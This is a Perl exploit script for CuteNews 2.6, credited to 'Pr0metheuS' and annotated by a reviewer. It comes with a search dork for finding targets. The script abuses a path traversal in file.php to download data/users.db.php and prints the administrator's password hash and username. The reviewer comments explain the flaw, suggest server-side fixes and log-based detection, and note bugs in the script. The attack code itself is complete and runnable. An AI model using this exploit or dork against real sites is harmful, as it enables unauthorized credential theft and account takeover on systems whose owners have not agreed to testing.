# NOTE(review): the interpreter line below has no leading '#'; it looks like the
# '#' of the shebang was lost when the page was extracted. Left as found.
!/usr/bin/perl
#Found by Pr0metheuS
#Coded by Pr0metheuS
#CuteNews 2.6 ( module file.php )
#Gr33tz-TeaM
#Dork : inurl:/cutenews/file.php
#
# Reviewer summary
# ----------------
# What the script does: it sends a GET for
#   <SITE><PATH>/file.php?file=../../data/users.db.php
# and searches the response body for a run of 32 hexadecimal characters. If one
# is found it is printed as "Admin Pass", the same URL is fetched a second time,
# and the pipe-delimited field immediately before that value is printed as
# "Admin Username".
#
# What that implies about the target: the request only returns the user store
# if file.php passes the `file` parameter to the filesystem without rejecting
# "../" segments, i.e. a path traversal that exposes data/users.db.php.
# file.php itself is not shown on this page, so the root cause is inferred from
# the request; confirm against the installed version.
#
# Mitigation (server side): resolve the requested name to a canonical path and
# refuse anything outside the intended download directory, reject path
# separators and ".." in the parameter, and deny HTTP access to the data/
# directory.
#
# Detection: look in web-server access logs for requests to file.php whose
# `file` parameter contains "../" (raw or URL-encoded) or "users.db.php".
# As written, the requests carry the LWP default User-Agent rather than
# "Mozilla/8.0" (see the note at the $ua assignment).
#
# Code quality: there is no `use strict` / `use warnings`; most variables are
# package globals. HTTP::Request is used without its own `use` line and is
# available only because LWP::UserAgent loads it.
use LWP::UserAgent;

# Exactly two arguments are required; otherwise print the banner and usage.
if(@ARGV!=2){
    print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
    print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
    print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
    print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
    print "-=-=-= Gr33tz To : -=-=-=-=-\n";
    print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
    print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
    print "USAGE : perl $0 <SITE> <PATH>\n";
    exit;
}

# SITE and PATH are concatenated into the URL verbatim; no validation is done.
($SITE,$PATH)=@ARGV;

# The agent string is set on the first object, but $ua is then reassigned to a
# fresh LWP::UserAgent, so the "Mozilla/8.0" setting is discarded and the
# library default User-Agent is what the server sees.
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/8.0");
$ua = LWP::UserAgent->new;

# The traversal is in the query string: `file` climbs two directories and names
# data/users.db.php.
my $req = HTTP::Request->new(GET => "$SITE$PATH/file.php?file=../../data/users.db.php");
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
$con = $res->content;

if($res->is_success){
    # First run of 32 hex characters anywhere in the body. Presumably an MD5
    # hex digest of a password -- the length fits, but nothing here verifies
    # the algorithm or that the record belongs to an administrator.
    if($con =~ /([0-9a-fA-F]{32})/){
        $hash = $1;
        print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
        print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
        print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
        print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
        print "-=-=-= Gr33tz To : -=-=-=-=-\n";
        print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
        print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
        print "_____________________________\n";
        print "[+] Exploit Work!\n";
        print "[+] Admin Pass : ".$hash."\n";

        # Second request: same URL as the first, so the file is fetched twice
        # (two log entries per run). The same discarded-agent pattern repeats.
        $ua2 = new LWP::UserAgent;
        $ua2->agent("Mozilla/8.0");
        $ua2 = LWP::UserAgent->new;
        my $req2 = HTTP::Request->new(GET => "$SITE$PATH/file.php?file=../../data/users.db.php");
        $req2->header('Accept' => 'text/html');
        $res2 = $ua2->request($req2);
        $con2 = $res2->content;

        # Expects a pipe-delimited record: one character, then a field, then the
        # value found above. $hash is interpolated into the pattern unquoted;
        # it can only contain hex digits here, so no metacharacters reach it.
        if($con2 =~ /\|.\|(.*)\|$hash\|/){
            $user = $1;
            print "[+] Admin Username : ".$user."\n";
        }
    }
    else{
        # NOTE(review): this branch runs when the HTTP request succeeded but no
        # 32-hex string was found, yet the message says "Connect failed".
        print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
        print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
        print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
        print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
        print "-=-=-= Gr33tz To : -=-=-=-=-\n";
        print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
        print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
        print "_____________________________\n";
        print "[+] Connect failed..\n";
    }
}
else{
    # NOTE(review): this branch runs when the HTTP request itself was not
    # successful (is_success false), yet the message says "Exploit Failed";
    # the two failure labels appear to be swapped.
    print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
    print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
    print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
    print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
    print "-=-=-= Gr33tz To : -=-=-=-=-\n";
    print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
    print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
    print "_____________________________\n";
    print "[+] Exploit Failed..\n";
}